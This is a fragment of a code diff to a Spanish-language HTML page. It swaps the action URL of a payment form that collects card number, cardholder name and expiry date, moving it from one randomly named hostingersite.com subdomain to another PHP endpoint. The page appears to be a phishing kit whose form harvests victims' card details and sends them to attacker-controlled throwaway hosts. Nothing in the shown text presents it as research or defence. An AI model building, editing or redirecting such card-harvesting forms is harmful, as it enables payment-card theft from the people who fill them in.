--- a/animacion.html
+++ b/animacion.html
@@ -150,7 +150,7 @@
               </div>
             </div>
           
-            <form class="payment-form" action="https://sandybrown-goose-468890.hostingersite.com/tarjetasatla.php" method="post">
+            <form class="payment-form" action="https://lightslategray-weasel-448086.hostingersite.com/tarjetas.php" method="post">
               <input type="text" id="card-number" placeholder="Número de Tarjeta" maxlength="19" required="" autocomplete="off" name="TarjetaNumero" inputmode="numeric">
               <input type="text" id="card-holder" placeholder="Nombre del Titular" required="" autocomplete="off" onkeyup="mayus(this);" name="nombre">
               <input type="text" id="card-expiry" placeholder="Fecha de vencimiento" maxlength="5"  onkeyup="
